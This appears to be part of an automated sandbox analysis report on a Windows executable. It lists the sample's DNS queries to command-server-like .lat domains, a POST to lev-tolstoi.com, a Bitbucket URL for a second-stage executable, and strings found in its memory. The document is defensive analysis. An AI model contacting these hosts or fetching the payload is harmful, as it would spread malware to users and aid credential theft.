Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: TmmiCE5Ulm.exe, 00000000.00000002.2691243318.0000000006179000.00000002.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409055917.0000000005B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-pg=q
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001188000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B01000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/TU
Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001113000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334259914.0000000001199000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001113000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: TmmiCE5Ulm.exe, 00000000.00000002.2687761991.0000000000DDA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe_1
Source: TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exef
Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001128000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
